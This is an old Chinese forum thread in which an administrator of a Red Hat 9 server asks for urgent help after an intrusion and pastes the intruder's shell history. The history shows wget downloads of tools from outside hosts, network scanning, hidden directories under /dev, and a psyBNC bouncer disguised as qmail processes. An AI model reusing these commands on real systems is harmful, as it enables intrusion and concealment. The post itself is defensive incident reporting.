免费注册 查看新帖 |

Chinaunix

  平台 论坛 博客 文库
最近访问板块 发新帖
查看: 1057 | 回复: 1
打印 上一主题 下一主题

系统被入侵,帮帮忙阿!!!非常急!!!关键字:psybnc  关闭 [复制链接]

论坛徽章:
0
跳转到指定楼层
1 [收藏(0)] [报告]
发表于 2005-10-08 11:57 |只看该作者 |倒序浏览
系统是redHat 9,自己编译的内核 2.4.27 ,装了apche、mysql、php、proftp、qmail。

今天早上登录系统,查看系统日志,发现/var/log/ 下面被删了个干净,
再查看history 发现下面的内容
   2  cd /dev/.man
    3  cd /dev/ida/.man
    4  wget www.warrlop.0catch.com/a.tgz
    5  wget 209.63.57.10/a.tgz
    6  ftp
    7  ps x
    8  wget www.rossi25.go.ro/xx.tgz
    9  tar xzvf xx.tgz
   10  rm -rf xx.tgz
   11  cd .sh
   12  ls
   13  ./x 65.35
   14  ./x 216.48
   15  ./x 216.49
   16  exit
   17  cd /var/tmp'ls -a
   18  cd /var/tmp;ls -a
   19  cd /var/dev
   20  cd /dev
   21  mkdir "."
   22  mkdir " "
   23  cd " "
   24  wget iceghost.go.ro/b.tar.gz
   25  RM -RF no_user.phtml
   26  rm -rf no_user.phtml
   27  wget geocities.com/kiaxk/b.tar.gz
   28  wget http://www.psychoid.net/psyBNC2.3.1.tar.gz
   29  tar zxvf psyBNC2.3.1.tar.gz
   30  rm -rf psyBNC2.3.1.tar.gz
   31  mv psybnc html
   32  cd html
   33  ls -a
   34  ps -ax
   35  mv psybnc [httpd <defunct>;]
   36   mv psybnc "[httpd <defunct>;]"
   37  mv psybnc "qmail-clean"
   38  ls -a
   39  make
   40  ps -ax
   41  mv psybnc "/var/qmail/bin/qmail-queue"
   42  mv psybnc "qmail-clean"
   43  PATHATH
   44  PATH=ATH
   45  "qmail-clean"
   46  uname -a
   47  id

论坛徽章:
0
2 [报告]
发表于 2005-10-08 12:36 |只看该作者

系统被入侵,帮帮忙阿!!!非常急!!!关键字:psybnc

http://bbs.chinaunix.net/forum/viewtopic.php?t=622982&show_type=
您需要登录后才可以回帖 登录 | 注册

本版积分规则 发表回复

  

北京盛拓优讯信息技术有限公司. 版权所有 京ICP备16024965号-6 北京市公安局海淀分局网监中心备案编号:11010802020122 niuxiaotong@pcpop.com 17352615567
未成年举报专区
中国互联网协会会员  联系我们:huangweiwei@itpub.net
感谢所有关心和支持过ChinaUnix的朋友们 转载本站内容请注明原作者名及出处

清除 Cookies - ChinaUnix - Archiver - WAP - TOP